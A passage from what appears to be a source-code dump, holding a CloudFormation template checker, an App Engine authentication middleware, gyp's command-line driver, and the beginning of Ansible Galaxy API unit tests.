    - that `Ref` and `GetAtt` point to existing resources or parameters in the
    template
    - that the outputs used as params in the main stack exist in the substacks

    Exits with a non-zero status when any check fails.
    """
    templates_path, filename = os.path.split(os.path.realpath(template))
    main_stack_name, filetype = os.path.splitext(filename)
    main_stack = Stack(main_stack_name)
    main_stack.load_from_file(os.path.join(templates_path, filename))
    # One Stack object per nested-stack resource, plus the main stack;
    # sibling templates are expected to share the main template's extension.
    stacks = {
        name: Stack.new_substack(name, resource)
        for name, resource in main_stack.resources.items()
        if resource["Type"] == "AWS::CloudFormation::Stack"
    }
    stacks[main_stack_name] = main_stack
    main_stack.detect_parameter_name_mismatch()
    error = False
    for name, substack in stacks.items():
        substack_path = os.path.join(templates_path, name) + filetype
        LOGGER.debug("Loading Stack %s file %s", name, substack_path)
        substack.load_from_file(substack_path)
        if name != main_stack_name:
            # We don't validate Parameters on the Main stack
            for param in substack.missing_parameters():
                click.echo(
                    "Stack {0} should give substack {1} parameter: {2}".format(
                        crayons.yellow(main_stack_name), crayons.yellow(name), crayons.red(param)
                    ),
                    err=True,
                )
                error = True
            for param in substack.extra_parameters():
                click.echo(
                    "Stack {0} is giving extra parameter {1} to substack: {2}".format(
                        crayons.yellow(main_stack_name), crayons.red(param), crayons.yellow(name)
                    ),
                    err=True,
                )
                error = True
        for ref in substack.missing_refs():
            click.echo(
                "Stack {0} has undefined {1} statement: {2}".format(
                    crayons.yellow(name), crayons.yellow("Ref"), crayons.red(ref)
                ),
                err=True,
            )
            error = True
        for getatt in substack.missing_getatt():
            click.echo(
                "Stack {0} has undefined {1} statement: {2}.{3}".format(
                    crayons.yellow(name),
                    crayons.yellow("GetAtt"),
                    crayons.red(getatt[0]),
                    getatt[1],
                ),
                err=True,
            )
            error = True
    # Special case for the Main stack GetAtt
    # "Outputs.<Name>" references must exist in the target substack.
    for att in main_stack.find(CFN_GETATT):
        if att[1].startswith("Outputs.") and att[0] in stacks:
            stack = stacks[att[0]]
            output_name = att[1].replace("Outputs.", "")
            if output_name not in stacks[att[0]].outputs:
                click.echo(
                    "Stack {0} references undefined Output {1} from substack {2}".format(
                        crayons.yellow(main_stack_name),
                        crayons.red(output_name),
                        crayons.yellow(stack.name),
                    ),
                    err=True,
                )
                error = True
    if not error:
        click.echo(crayons.green("Congratulations, your templates appear to be OK!\n"))
    else:
        sys.exit(error)
| mit |
wri/gfw-api | lib/engineauth/middleware.py | 1 | 6320 | from __future__ import absolute_import
from engineauth import models
from engineauth import utils
from engineauth.config import load_config
import re
import traceback
from webob import Response
from webob import Request
class EngineAuthResponse(Response):
    def _save_session(self):
        """Persist the request's session and refresh the '_eauth' cookie.

        Skipped on sign-out, and skipped entirely when the session hash
        is unchanged since it was loaded (no put(), no cookie rewrite).
        """
        session = self.request.session
        if self.request.path == '/user/sign_out':
            return session
        # Compare the hash that we set in load_session to the current one.
        # We only save the session and cookie if this value has changed.
        if self.request.session_hash == session.hash():
            return session
        session.put()
        # If we have a user_id we want to updated the
        # session to use the user_id as the key.
        if session.user_id is not None:
            session_id = session.key.id()
            if session_id != session.user_id:
                session = models.Session.upgrade_to_user_session(
                    session_id, session.user_id)
        # HACK: hard-coded production domain so the cookie spans all
        # globalforestwatch.org subdomains.
        if "globalforestwatch.org" in self.request.host_url:
            self.set_cookie('_eauth', session.serialize(), domain='.globalforestwatch.org')
        else:
            self.set_cookie('_eauth', session.serialize())
        return self

    def _save_user(self):
        # Intentionally a no-op; user persistence happens on the request side.
        pass
class EngineAuthRequest(Request):
    ResponseClass = EngineAuthResponse

    def _load_session(self):
        """Load the session from the '_eauth' cookie, creating a fresh
        one when the cookie is absent or does not resolve."""
        value = self.cookies.get('_eauth')
        session = None
        if value:
            session = models.Session.get_by_value(value)
        if session is not None:
            # Create a hash for later comparison,
            # to determine if a put() is required
            session_hash = session.hash()
        else:
            session = models.Session.create()
            # set this to False to ensure a cookie
            # is saved later in the response.
            session_hash = '0'
        self.session = session
        self.session_hash = session_hash
        return self

    def _get_user_class(self):
        # Fall back to the bundled User model when the configured
        # 'user_model' class path cannot be imported.
        try:
            return utils.import_class(self._config['user_model'])
        except Exception:
            return models.User

    def _load_user(self):
        """Resolve self.user from the session's user_id (None when absent)."""
        if self.session is not None and self.session.user_id:
            self.user = self._get_user_class().get_by_id(int(self.session.user_id))
            if self.user is None:
                # TODO: If the user_id from the session returns no user,
                # then remove it.
                pass
        else:
            self.user = None
        return self

    def _load_user_by_profile(self, profile):
        """Attach an auth profile to the current user, creating the user
        from the profile when nobody is logged in."""
        # if the user is logged in update that user with the profile details
        if self.user:
            self.user.add_profile(profile)
        # else get or create a user based on the profile
        else:
            self.user = self._get_user_class().get_or_create_by_profile(profile)
        # Add user to session
        self.session.user_id = self.user.get_id()
    load_user_by_profile = _load_user_by_profile

    def _add_message(self, message, level=None, key='_messages'):
        # Messages accumulate in session.data under `key` until consumed.
        if not self.session.data.get(key):
            self.session.data[key] = []
        return self.session.data[key].append({
            'message': message, 'level': level})
    add_message = _add_message

    def _get_messages(self, key='_messages'):
        # Pop-and-return: reading the messages also clears them; returns
        # None when no messages were queued.
        try:
            return self.session.data.pop(key)
        except KeyError:
            pass
    get_messages = _get_messages

    def _set_redirect_back(self):
        # Remember the referring URI so the user can be sent back after auth.
        next_uri = self.referer
        if next_uri is not None and self._config['redirect_back']:
            self.session.data['_redirect_uri'] = next_uri
    set_redirect_uri = _set_redirect_back

    def _get_redirect_uri(self):
        # Pop the stored URI; fall back to the configured success page.
        try:
            return self.session.data.pop('_redirect_uri').encode('utf-8')
        except KeyError:
            return self._config['success_uri']
    get_redirect_uri = _get_redirect_uri

    def _set_globals(self, environ):
        # Expose the session and user to downstream WSGI apps.
        # environ['ea.config'] = req.config
        environ['ea.session'] = self.session
        environ['ea.user'] = self.user
class AuthMiddleware(object):
    """WSGI middleware that loads the session/user for every request and
    dispatches <base_uri>/<provider> URLs to the configured auth strategy."""

    def __init__(self, app, config=None):
        self.app = app
        self._config = load_config(config)
        # Matches "<base_uri>/<provider>/<additional params>".
        self._url_parse_re = re.compile(r'%s/([^\s/]+)/*(\S*)' %
                                        (self._config['base_uri']))

    def __call__(self, environ, start_response):
        # If the request is to the admin, return
        if environ['PATH_INFO'].startswith('/_ah/'):
            return self.app(environ, start_response)
        # load session
        req = EngineAuthRequest(environ)
        req._config = self._config
        req._load_session()
        req._load_user()
        if req._config['redirect_back']:
            req._set_redirect_back()
        resp = None
        # If the requesting url is for engineauth load the strategy
        if environ['PATH_INFO'].startswith(self._config['base_uri']):
            # extract provider and additional params from the url
            provider, provider_params = self._url_parse_re.match(
                req.path_info).group(1, 2)
            if provider:
                req.provider = provider
                req.provider_params = provider_params
                # load the desired strategy class
                strategy_class = self._load_strategy(provider)
                resp = req.get_response(strategy_class(self.app, self._config))
                if resp.request is None:
                    # TODO: determine why this is necessary.
                    resp.request = req
        if resp is None:
            # Not an auth URL: pass the request through to the wrapped app.
            resp = req.get_response(self.app)
        # Save session, return response
        resp._save_session()
        return resp(environ, start_response)

    def _load_strategy(self, provider):
        """Import and return the strategy class configured for `provider`."""
        try:
            strategy_location = self._config[
                'provider.{0}'.format(provider)]['class_path']
            return utils.import_class(strategy_location)
        except Exception, e:
            traceback.print_exc()
            # NOTE(review): Python 2 tuple-raise form; also the message
            # says 'location' but the lookup above uses 'class_path' --
            # confirm which key name is correct.
            raise(Exception, "You must provide a location for the {0} "\
                "strategy. Add a 'location' key to the "\
                "'provider.{0}' config dict".format(provider))
| gpl-2.0 |
rafaeltomesouza/frontend-class1 | aula2/a11/linkedin/client/.gradle/yarn/node_modules/node-gyp/gyp/pylib/gyp/__init__.py | 1524 | 22178 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import gyp.input
import optparse
import os.path
import re
import shlex
import sys
import traceback
from gyp.common import GypError
# Default debug modes for GYP
debug = {}
# List of "official" debug modes, but you can use anything you like.
DEBUG_GENERAL = 'general'
DEBUG_VARIABLES = 'variables'
DEBUG_INCLUDES = 'includes'
def DebugOutput(mode, message, *args):
    """Print a debug message when `mode` (or 'all') is enabled in gyp.debug.

    The output is prefixed with MODE:file:line:function of the caller;
    `args`, when given, are %-interpolated into `message`.
    """
    if 'all' in gyp.debug or mode in gyp.debug:
        ctx = ('unknown', 0, 'unknown')
        try:
            # Grab (filename, lineno, function) of our immediate caller.
            f = traceback.extract_stack(limit=2)
            if f:
                ctx = f[0][:3]
        except:
            pass
        if args:
            message %= args
        print '%s:%s:%d:%s %s' % (mode.upper(), os.path.basename(ctx[0]),
                                  ctx[1], ctx[2], message)
def FindBuildFiles():
    """Return the names of all .gyp files in the current working directory."""
    extension = '.gyp'
    return [entry for entry in os.listdir(os.getcwd())
            if entry.endswith(extension)]
def Load(build_files, format, default_variables={},
         includes=[], depth='.', params=None, check=False,
         circular_check=True, duplicate_basename_check=True):
    """
    Loads one or more specified build files.
    default_variables and includes will be copied before use.
    Returns the generator for the specified format and the
    data returned by loading the specified build files.

    NOTE(review): the mutable default arguments (default_variables={},
    includes=[]) are shared across calls; both are copied before being
    mutated below, so this is safe but fragile.
    """
    if params is None:
        params = {}
    # A "format-flavor" string carries the flavor after the first dash.
    if '-' in format:
        format, params['flavor'] = format.split('-', 1)
    default_variables = copy.copy(default_variables)
    # Default variables provided by this program and its modules should be
    # named WITH_CAPITAL_LETTERS to provide a distinct "best practice" namespace,
    # avoiding collisions with user and automatic variables.
    default_variables['GENERATOR'] = format
    default_variables['GENERATOR_FLAVOR'] = params.get('flavor', '')
    # Format can be a custom python file, or by default the name of a module
    # within gyp.generator.
    if format.endswith('.py'):
        generator_name = os.path.splitext(format)[0]
        path, generator_name = os.path.split(generator_name)
        # Make sure the path to the custom generator is in sys.path
        # Don't worry about removing it once we are done.  Keeping the path
        # to each generator that is used in sys.path is likely harmless and
        # arguably a good idea.
        path = os.path.abspath(path)
        if path not in sys.path:
            sys.path.insert(0, path)
    else:
        generator_name = 'gyp.generator.' + format
    # These parameters are passed in order (as opposed to by key)
    # because ActivePython cannot handle key parameters to __import__.
    generator = __import__(generator_name, globals(), locals(), generator_name)
    for (key, val) in generator.generator_default_variables.items():
        default_variables.setdefault(key, val)
    # Give the generator the opportunity to set additional variables based on
    # the params it will receive in the output phase.
    if getattr(generator, 'CalculateVariables', None):
        generator.CalculateVariables(default_variables, params)
    # Give the generator the opportunity to set generator_input_info based on
    # the params it will receive in the output phase.
    if getattr(generator, 'CalculateGeneratorInputInfo', None):
        generator.CalculateGeneratorInputInfo(params)
    # Fetch the generator specific info that gets fed to input, we use getattr
    # so we can default things and the generators only have to provide what
    # they need.
    generator_input_info = {
        'non_configuration_keys':
            getattr(generator, 'generator_additional_non_configuration_keys', []),
        'path_sections':
            getattr(generator, 'generator_additional_path_sections', []),
        'extra_sources_for_rules':
            getattr(generator, 'generator_extra_sources_for_rules', []),
        'generator_supports_multiple_toolsets':
            getattr(generator, 'generator_supports_multiple_toolsets', False),
        'generator_wants_static_library_dependencies_adjusted':
            getattr(generator,
                    'generator_wants_static_library_dependencies_adjusted', True),
        'generator_wants_sorted_dependencies':
            getattr(generator, 'generator_wants_sorted_dependencies', False),
        'generator_filelist_paths':
            getattr(generator, 'generator_filelist_paths', None),
    }
    # Process the input specific to this generator.
    result = gyp.input.Load(build_files, default_variables, includes[:],
                            depth, generator_input_info, check, circular_check,
                            duplicate_basename_check,
                            params['parallel'], params['root_targets'])
    return [generator] + result
def NameValueListToDict(name_value_list):
  """Convert a list of 'NAME=VALUE' strings into a dictionary.

  A bare 'NAME' entry (no '=') maps to True.  Values that parse as
  integers are stored as ints; everything else stays a string.  Later
  entries for the same NAME overwrite earlier ones.
  """
  pairs = {}
  for entry in name_value_list:
    name, sep, value = entry.partition('=')
    if not sep:
      # No '=' present: treat the entry as a boolean flag.
      pairs[name] = True
      continue
    # Prefer an int when the value looks like one; otherwise keep the string.
    try:
      pairs[name] = int(value)
    except ValueError:
      pairs[name] = value
  return pairs
def ShlexEnv(env_name):
  """Split the value of environment variable |env_name| like a POSIX shell.

  Returns a list of tokens; an unset or empty variable yields an empty
  list.  (Previously an empty-but-set variable leaked the raw empty string
  through while an unset one produced []; callers only ever iterate or
  concatenate the result, so always returning a list is backward-compatible
  and gives the function a single return type.)
  """
  value = os.environ.get(env_name, '')
  return shlex.split(value) if value else []
def FormatOpt(opt, value):
  """Render a command-line option together with its value.

  Long options use the '--opt=value' form; short options are simply
  concatenated ('-Dvalue').
  """
  if opt.startswith('--'):
    return '{0}={1}'.format(opt, value)
  return opt + value
def RegenerateAppendFlag(flag, values, predicate, env_name, options):
  """Regenerate the command-line flags for an option with action='append'.

  Environment-derived values (from |env_name|, when the environment is in
  use) come first, de-duplicated so that the last occurrence wins; then the
  values that were given on the command line (|values|) are appended.  This
  mirrors how command-line flags override the environment, while keeping the
  regenerated flags self-contained even when the environment is no longer
  set.
  """
  regenerated = []
  if env_name and options.use_environment:
    for raw in ShlexEnv(env_name):
      formatted = FormatOpt(flag, predicate(raw))
      # Keep only the last occurrence of a repeated flag value.
      if formatted in regenerated:
        regenerated.remove(formatted)
      regenerated.append(formatted)
  for raw in (values or []):
    regenerated.append(FormatOpt(flag, predicate(raw)))
  return regenerated
def RegenerateFlags(options):
  """Compute command-line flags that would recreate |options|.

  Environment variables are taken into account, but the resulting list is
  self-sufficient (it begins with --ignore-environment), so replaying it
  yields an equivalent options object even without the environment.  Path
  options are normalized relative to options.depth.  The format flag is
  deliberately omitted; the calling generator supplies it.
  """
  def FixPath(path):
    # Re-anchor |path| relative to the depth directory; an empty result
    # means "the current directory".
    path = gyp.common.FixIfRelativePath(path, options.depth)
    return path or os.path.curdir
  def Noop(value):
    return value
  # Always ignore the environment when regenerating, so that stale or
  # changed environment variables cannot alter the replayed flags.
  flags = ['--ignore-environment']
  for name, metadata in options._regeneration_metadata.iteritems():
    opt = metadata['opt']
    action = metadata['action']
    env_name = metadata['env_name']
    value = getattr(options, name)
    value_predicate = FixPath if metadata['type'] == 'path' else Noop
    if action == 'append':
      flags.extend(RegenerateAppendFlag(opt, value, value_predicate,
                                        env_name, options))
    elif action in ('store', None):  # None is a synonym for 'store'.
      if value:
        flags.append(FormatOpt(opt, value_predicate(value)))
      elif options.use_environment and env_name and os.environ.get(env_name):
        flags.append(FormatOpt(opt, value_predicate(os.environ.get(env_name))))
    elif action in ('store_true', 'store_false'):
      # Emit the bare flag only when the stored value matches the action's
      # "flag was given" state.
      if (action == 'store_true') == bool(value):
        flags.append(opt)
      elif options.use_environment and env_name:
        print >>sys.stderr, ('Warning: environment regeneration unimplemented '
                             'for %s flag %r env_name %r' % (action, opt,
                                                             env_name))
    else:
      print >>sys.stderr, ('Warning: regeneration unimplemented for action %r '
                           'flag %r' % (action, opt))
  return flags
class RegeneratableOptionParser(optparse.OptionParser):
  """An OptionParser that records the metadata needed to regenerate flags.

  Every regenerable option is remembered so that an equivalent command line
  can later be reconstructed (see RegenerateFlags); parse_args attaches the
  recorded metadata to the returned values object as
  ``_regeneration_metadata``.
  """
  def __init__(self):
    self.__regen_metadata = {}
    optparse.OptionParser.__init__(self)

  def add_option(self, *args, **kw):
    """Add an option to the parser.

    Accepts everything OptionParser.add_option does, plus:
      regenerate: set to False to exclude this option from regeneration.
      env_name: name of an environment variable that supplies additional
        values for this option.
      type: type='path' marks values that must be rebased relative to
        options.depth when regenerating.
    """
    env_name = kw.pop('env_name', None)
    if 'dest' in kw and kw.pop('regenerate', True):
      dest = kw['dest']
      # optparse has no 'path' type of its own: remember it for the
      # regenerator and hand optparse a plain string instead.
      opt_type = kw.get('type')
      if opt_type == 'path':
        kw['type'] = 'string'
      self.__regen_metadata[dest] = {
          'action': kw.get('action'),
          'type': opt_type,
          'env_name': env_name,
          'opt': args[0],
      }
    optparse.OptionParser.add_option(self, *args, **kw)

  def parse_args(self, *args):
    values, args = optparse.OptionParser.parse_args(self, *args)
    # Expose the recorded metadata to RegenerateFlags via the values object.
    values._regeneration_metadata = self.__regen_metadata
    return values, args
def gyp_main(args):
  """Command-line driver for gyp.

  Parses |args|, locates build files and the configuration directory,
  resolves formats/defines/includes/generator flags from the command line
  and (optionally) the environment, then runs Load and GenerateOutput for
  each requested format.  Returns 0 on success; raises GypError on fatal
  problems.
  """
  my_name = os.path.basename(sys.argv[0])
  parser = RegeneratableOptionParser()
  usage = 'usage: %s [options ...] [build_file ...]'
  parser.set_usage(usage.replace('%s', '%prog'))
  parser.add_option('--build', dest='configs', action='append',
                    help='configuration for build after project generation')
  parser.add_option('--check', dest='check', action='store_true',
                    help='check format of gyp files')
  parser.add_option('--config-dir', dest='config_dir', action='store',
                    env_name='GYP_CONFIG_DIR', default=None,
                    help='The location for configuration files like '
                    'include.gypi.')
  parser.add_option('-d', '--debug', dest='debug', metavar='DEBUGMODE',
                    action='append', default=[], help='turn on a debugging '
                    'mode for debugging GYP.  Supported modes are "variables", '
                    '"includes" and "general" or "all" for all of them.')
  parser.add_option('-D', dest='defines', action='append', metavar='VAR=VAL',
                    env_name='GYP_DEFINES',
                    help='sets variable VAR to value VAL')
  parser.add_option('--depth', dest='depth', metavar='PATH', type='path',
                    help='set DEPTH gyp variable to a relative path to PATH')
  parser.add_option('-f', '--format', dest='formats', action='append',
                    env_name='GYP_GENERATORS', regenerate=False,
                    help='output formats to generate')
  parser.add_option('-G', dest='generator_flags', action='append', default=[],
                    metavar='FLAG=VAL', env_name='GYP_GENERATOR_FLAGS',
                    help='sets generator flag FLAG to VAL')
  parser.add_option('--generator-output', dest='generator_output',
                    action='store', default=None, metavar='DIR', type='path',
                    env_name='GYP_GENERATOR_OUTPUT',
                    help='puts generated build files under DIR')
  parser.add_option('--ignore-environment', dest='use_environment',
                    action='store_false', default=True, regenerate=False,
                    help='do not read options from environment variables')
  parser.add_option('-I', '--include', dest='includes', action='append',
                    metavar='INCLUDE', type='path',
                    help='files to include in all loaded .gyp files')
  # --no-circular-check disables the check for circular relationships between
  # .gyp files.  These relationships should not exist, but they've only been
  # observed to be harmful with the Xcode generator.  Chromium's .gyp files
  # currently have some circular relationships on non-Mac platforms, so this
  # option allows the strict behavior to be used on Macs and the lenient
  # behavior to be used elsewhere.
  # TODO(mark): Remove this option when http://crbug.com/35878 is fixed.
  parser.add_option('--no-circular-check', dest='circular_check',
                    action='store_false', default=True, regenerate=False,
                    help="don't check for circular relationships between files")
  # --no-duplicate-basename-check disables the check for duplicate basenames
  # in a static_library/shared_library project. Visual C++ 2008 generator
  # doesn't support this configuration. Libtool on Mac also generates warnings
  # when duplicate basenames are passed into Make generator on Mac.
  # TODO(yukawa): Remove this option when these legacy generators are
  # deprecated.
  parser.add_option('--no-duplicate-basename-check',
                    dest='duplicate_basename_check', action='store_false',
                    default=True, regenerate=False,
                    help="don't check for duplicate basenames")
  parser.add_option('--no-parallel', action='store_true', default=False,
                    help='Disable multiprocessing')
  parser.add_option('-S', '--suffix', dest='suffix', default='',
                    help='suffix to add to generated files')
  parser.add_option('--toplevel-dir', dest='toplevel_dir', action='store',
                    default=None, metavar='DIR', type='path',
                    help='directory to use as the root of the source tree')
  parser.add_option('-R', '--root-target', dest='root_targets',
                    action='append', metavar='TARGET',
                    help='include only TARGET and its deep dependencies')

  options, build_files_arg = parser.parse_args(args)
  build_files = build_files_arg

  # Set up the configuration directory (defaults to ~/.gyp)
  if not options.config_dir:
    home = None
    home_dot_gyp = None
    if options.use_environment:
      home_dot_gyp = os.environ.get('GYP_CONFIG_DIR', None)
      if home_dot_gyp:
        home_dot_gyp = os.path.expanduser(home_dot_gyp)

    if not home_dot_gyp:
      # Fall back to $HOME/.gyp (or %USERPROFILE%\.gyp on Windows/Cygwin),
      # but only keep it if the directory actually exists.
      home_vars = ['HOME']
      if sys.platform in ('cygwin', 'win32'):
        home_vars.append('USERPROFILE')
      for home_var in home_vars:
        home = os.getenv(home_var)
        if home != None:
          home_dot_gyp = os.path.join(home, '.gyp')
          if not os.path.exists(home_dot_gyp):
            home_dot_gyp = None
          else:
            break
  else:
    home_dot_gyp = os.path.expanduser(options.config_dir)

  if home_dot_gyp and not os.path.exists(home_dot_gyp):
    home_dot_gyp = None

  if not options.formats:
    # If no format was given on the command line, then check the env variable.
    generate_formats = []
    if options.use_environment:
      generate_formats = os.environ.get('GYP_GENERATORS', [])
    if generate_formats:
      generate_formats = re.split(r'[\s,]', generate_formats)
    if generate_formats:
      options.formats = generate_formats
    else:
      # Nothing in the variable, default based on platform.
      if sys.platform == 'darwin':
        options.formats = ['xcode']
      elif sys.platform in ('win32', 'cygwin'):
        options.formats = ['msvs']
      else:
        options.formats = ['make']

  if not options.generator_output and options.use_environment:
    g_o = os.environ.get('GYP_GENERATOR_OUTPUT')
    if g_o:
      options.generator_output = g_o

  # --no-parallel stores 'no_parallel'; derive the positive form used below.
  options.parallel = not options.no_parallel

  for mode in options.debug:
    gyp.debug[mode] = 1

  # Do an extra check to avoid work when we're not debugging.
  if DEBUG_GENERAL in gyp.debug:
    DebugOutput(DEBUG_GENERAL, 'running with these options:')
    for option, value in sorted(options.__dict__.items()):
      if option[0] == '_':
        continue
      if isinstance(value, basestring):
        DebugOutput(DEBUG_GENERAL, "  %s: '%s'", option, value)
      else:
        DebugOutput(DEBUG_GENERAL, "  %s: %s", option, value)

  if not build_files:
    build_files = FindBuildFiles()
  if not build_files:
    raise GypError((usage + '\n\n%s: error: no build_file') %
                   (my_name, my_name))

  # TODO(mark): Chromium-specific hack!
  # For Chromium, the gyp "depth" variable should always be a relative path
  # to Chromium's top-level "src" directory.  If no depth variable was set
  # on the command line, try to find a "src" directory by looking at the
  # absolute path to each build file's directory.  The first "src" component
  # found will be treated as though it were the path used for --depth.
  if not options.depth:
    for build_file in build_files:
      build_file_dir = os.path.abspath(os.path.dirname(build_file))
      build_file_dir_components = build_file_dir.split(os.path.sep)
      components_len = len(build_file_dir_components)
      for index in xrange(components_len - 1, -1, -1):
        if build_file_dir_components[index] == 'src':
          options.depth = os.path.sep.join(build_file_dir_components)
          break
        del build_file_dir_components[index]

      # If the inner loop found something, break without advancing to another
      # build file.
      if options.depth:
        break

    if not options.depth:
      raise GypError('Could not automatically locate src directory.  This is'
                     'a temporary Chromium feature that will be removed.  Use'
                     '--depth as a workaround.')

  # If toplevel-dir is not set, we assume that depth is the root of our source
  # tree.
  if not options.toplevel_dir:
    options.toplevel_dir = options.depth

  # -D on the command line sets variable defaults - D isn't just for define,
  # it's for default.  Perhaps there should be a way to force (-F?) a
  # variable's value so that it can't be overridden by anything else.
  cmdline_default_variables = {}
  defines = []
  if options.use_environment:
    defines += ShlexEnv('GYP_DEFINES')
  if options.defines:
    defines += options.defines
  cmdline_default_variables = NameValueListToDict(defines)
  if DEBUG_GENERAL in gyp.debug:
    DebugOutput(DEBUG_GENERAL,
                "cmdline_default_variables: %s", cmdline_default_variables)

  # Set up includes.
  includes = []

  # If ~/.gyp/include.gypi exists, it'll be forcibly included into every
  # .gyp file that's loaded, before anything else is included.
  if home_dot_gyp != None:
    default_include = os.path.join(home_dot_gyp, 'include.gypi')
    if os.path.exists(default_include):
      print 'Using overrides found in ' + default_include
      includes.append(default_include)

  # Command-line --include files come after the default include.
  if options.includes:
    includes.extend(options.includes)

  # Generator flags should be prefixed with the target generator since they
  # are global across all generator runs.
  gen_flags = []
  if options.use_environment:
    gen_flags += ShlexEnv('GYP_GENERATOR_FLAGS')
  if options.generator_flags:
    gen_flags += options.generator_flags
  generator_flags = NameValueListToDict(gen_flags)
  if DEBUG_GENERAL in gyp.debug.keys():
    DebugOutput(DEBUG_GENERAL, "generator_flags: %s", generator_flags)

  # Generate all requested formats (use a set in case we got one format request
  # twice)
  for format in set(options.formats):
    params = {'options': options,
              'build_files': build_files,
              'generator_flags': generator_flags,
              'cwd': os.getcwd(),
              'build_files_arg': build_files_arg,
              'gyp_binary': sys.argv[0],
              'home_dot_gyp': home_dot_gyp,
              'parallel': options.parallel,
              'root_targets': options.root_targets,
              'target_arch': cmdline_default_variables.get('target_arch', '')}

    # Start with the default variables from the command line.
    [generator, flat_list, targets, data] = Load(
        build_files, format, cmdline_default_variables, includes, options.depth,
        params, options.check, options.circular_check,
        options.duplicate_basename_check)

    # TODO(mark): Pass |data| for now because the generator needs a list of
    # build files that came in.  In the future, maybe it should just accept
    # a list, and not the whole data dict.
    # NOTE: flat_list is the flattened dependency graph specifying the order
    # that targets may be built.  Build systems that operate serially or that
    # need to have dependencies defined before dependents reference them should
    # generate targets in the order specified in flat_list.
    generator.GenerateOutput(flat_list, targets, data, params)

    if options.configs:
      # Validate the requested --build configs against the first target's
      # configuration set before delegating the build to the generator.
      valid_configs = targets[flat_list[0]]['configurations'].keys()
      for conf in options.configs:
        if conf not in valid_configs:
          raise GypError('Invalid config specified via --build: %s' % conf)
      generator.PerformBuild(data, options.configs, params)

  # Done
  return 0
def main(args):
  """Entry point: run gyp_main, converting GypError into exit status 1."""
  try:
    return gyp_main(args)
  except GypError, e:
    # Fatal, expected failures print a one-line message instead of a traceback.
    sys.stderr.write("gyp: %s\n" % e)
    return 1
# NOTE: setuptools generated console_scripts calls function with no arguments
def script_main():
  """Zero-argument wrapper around main() for console_scripts entry points."""
  cmdline_args = sys.argv[1:]
  return main(cmdline_args)
if __name__ == '__main__':
  # Direct invocation: propagate gyp's return code as the process exit status.
  sys.exit(script_main())
| mit |
jtyr/ansible | test/units/galaxy/test_api.py | 11 | 37466 | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import os
import re
import pytest
import tarfile
import tempfile
import time
from io import BytesIO, StringIO
from units.compat.mock import MagicMock
from ansible import context
from ansible.errors import AnsibleError
from ansible.galaxy import api as galaxy_api
from ansible.galaxy.api import CollectionVersionMetadata, GalaxyAPI, GalaxyError
from ansible.galaxy.token import BasicAuthToken, GalaxyToken, KeycloakToken
from ansible.module_utils._text import to_native, to_text
from ansible.module_utils.six.moves.urllib import error as urllib_error
from ansible.utils import context_objects as co
from ansible.utils.display import Display
@pytest.fixture(autouse='function')
def reset_cli_args():
    # Autouse fixture: give every test a clean global-CLI-args singleton so
    # state cannot leak between tests.
    # NOTE(review): autouse= expects a bool; the truthy string 'function'
    # works, but autouse=True (or scope='function') was likely intended —
    # confirm.
    co.GlobalCLIArgs._Singleton__instance = None
    # Required to initialise the GalaxyAPI object
    context.CLIARGS._store = {'ignore_certs': False}
    yield
    co.GlobalCLIArgs._Singleton__instance = None
@pytest.fixture()
def collection_artifact(tmp_path_factory):
    """Yield the path to a publish-ready collection artifact tarball."""
    tmp_dir = to_text(tmp_path_factory.mktemp('test-ÅÑŚÌβŁÈ Output'))
    artifact_path = os.path.join(tmp_dir, 'namespace-collection-v1.0.0.tar.gz')
    payload = b"\x00\x01\x02\x03"
    member = tarfile.TarInfo('test')
    member.size = len(payload)
    member.mode = 0o0644
    with tarfile.open(artifact_path, 'w:gz') as archive:
        archive.addfile(tarinfo=member, fileobj=BytesIO(payload))
    yield artifact_path
def get_test_galaxy_api(url, version, token_ins=None, token_value=None):
    """Build a GalaxyAPI with its available API versions pre-seeded.

    Because _available_api_versions is populated here, g_connect() is never
    exercised; input data for v2 servers therefore has to append '/api/'
    itself.
    """
    token = token_ins or GalaxyToken(token_value or "my token")
    api = GalaxyAPI(None, "test", url)
    api._available_api_versions = {version: '%s' % version}
    api.token = token
    return api
def test_api_no_auth():
    """Without a token, _add_auth_token leaves the headers untouched."""
    headers = {}
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
    api._add_auth_token(headers, "")
    assert headers == {}
def test_api_no_auth_but_required():
    """Requiring auth with no token configured raises AnsibleError."""
    expected = "No access token or username set. A token can be set with --api-key, with 'ansible-galaxy login', " \
               "or set in ansible.cfg."
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
    with pytest.raises(AnsibleError, match=expected):
        api._add_auth_token({}, "", required=True)
def test_api_token_auth():
    """A GalaxyToken is sent as a 'Token <value>' Authorization header."""
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/",
                    token=GalaxyToken(token=u"my_token"))
    headers = {}
    api._add_auth_token(headers, "", required=True)
    assert headers == {'Authorization': 'Token my_token'}
def test_api_token_auth_with_token_type(monkeypatch):
    """An explicit token_type overrides the token's default header prefix."""
    token = KeycloakToken(auth_url='https://api.test/')
    monkeypatch.setattr(token, 'get', MagicMock(return_value='my_token'))
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
    headers = {}
    api._add_auth_token(headers, "", token_type="Bearer", required=True)
    assert headers == {'Authorization': 'Bearer my_token'}
def test_api_token_auth_with_v3_url(monkeypatch):
    """A v3 URL makes a Keycloak token use the Bearer scheme."""
    token = KeycloakToken(auth_url='https://api.test/')
    monkeypatch.setattr(token, 'get', MagicMock(return_value='my_token'))
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
    headers = {}
    api._add_auth_token(headers, "https://galaxy.ansible.com/api/v3/resource/name",
                        required=True)
    assert headers == {'Authorization': 'Bearer my_token'}
def test_api_token_auth_with_v2_url():
    """Only the real v2 path segment matters, not 'v3' elsewhere in the URL."""
    api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/",
                    token=GalaxyToken(token=u"my_token"))
    headers = {}
    # 'v3' appears in a random path component, but the URI's version segment
    # is v2, so the Token scheme must be used.
    api._add_auth_token(headers, "https://galaxy.ansible.com/api/v2/resourcev3/name",
                        required=True)
    assert headers == {'Authorization': 'Token my_token'}
def test_api_basic_auth_password():
